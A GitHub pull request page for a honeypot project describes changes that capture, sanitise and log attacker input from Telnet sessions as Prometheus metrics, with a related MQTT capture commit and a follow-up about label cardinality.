Skip to content

feat: capture and log attacker input from Telnet sessions#15

Open
vinayaktyagi10 wants to merge 3 commits intohoneynet:mainfrom
vinayaktyagi10:feat/telnet-payload-capture-clean
Open

feat: capture and log attacker input from Telnet sessions#15
vinayaktyagi10 wants to merge 3 commits intohoneynet:mainfrom
vinayaktyagi10:feat/telnet-payload-capture-clean

Conversation

@vinayaktyagi10
Copy link
Copy Markdown

@vinayaktyagi10 vinayaktyagi10 commented Mar 21, 2026

Summary

Adds real-time attacker input capture to the Telnet tarpit, logging
what attackers send during sessions as Prometheus metrics.

Changes

servers/telnet_pit.c

  • Add non-blocking read() after each successful IAC write
  • Sanitize captured input: replace non-printable bytes and IAC
    sequences (>126 or <32) with '.'
  • Emit Telnet action <ip> <data> metric via sendMetric on each read
  • Handle r==0 (client disconnected mid-session) with proper disconnect
    metric and cleanup

prometheus/main.go

  • Add telnet_pit_input CounterVec with labels ip and data
  • Handle action command in handleMetric switch statement
  • Guard against malformed/short metric lines with len(fields) check

Why

The Telnet pit previously discarded all data sent by attackers.
This change captures that data in real-time, enabling researchers
to observe attacker behavior and build datasets of credentials and
commands used in the wild.

Testing

Tested locally by connecting via nc and typing input. Confirmed
Telnet action <ip> <data> lines appear in server output per
keystroke. Graceful shutdown confirmed still working after changes.

@vinayaktyagi10
feat: capture and log attacker input from Telnet sessions
e362243 
- Add non-blocking read() after each IAC write in the queue loop
- Sanitize input: replace non-printable bytes and IAC sequences with '.'
- Emit 'Telnet action <ip> <data>' metric via sendMetric on each read
- Handle r==0 (client disconnected) with proper disconnect metric
- Data is logged immediately per read for real-time visibility
@vinayaktyagi10
feat: add telnet_pit_input metric to Prometheus exporter
66f121b 
- Add telnetInput CounterVec with labels 'ip' and 'data'
- Handle 'action' command in handleMetric switch
- Guard against malformed metric lines with len(fields) check
Uday9909 added a commit to Uday9909/EventHorizon that referenced this pull request Mar 23, 2026
@Uday9909
feat: capture and log attacker payload metadata from MQTT sessions
1dbde86 
Add mqtt_pit_payload_captured Prometheus metric that records
attacker-supplied data from three MQTT packet types:

- CONNECT: client_id, username, protocol version (password never captured)
- PUBLISH: topic name and payload
- SUBSCRIBE: topic filter

Follows the same sendMetric() unixgram IPC pattern as PR honeynet#15.

Safety:
- Passwords skipped entirely, never passed to any metric
- Binary payloads sanitized to printable ASCII
- All fields truncated at 256 bytes
- Malformed packets handled without crash
- NULL guards on all capture functions

Also removes password from existing credentials metric emission.
Old code sent username and password. New code sends username only.

Adds uint16_t port to struct mqttClient for source port labeling.
@Uday9909 Uday9909 mentioned this pull request Mar 23, 2026
Open
@vinayaktyagi10
Copy link
Copy Markdown
Author

vinayaktyagi10 commented Mar 23, 2026

Update: Removed data from metric labels to avoid unbounded
Prometheus cardinality. Arbitrary attacker input as a label creates
a new time series per unique string, which causes memory pressure
under real attack load. Raw input is still logged via printf for
visibility.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@vinayaktyagi10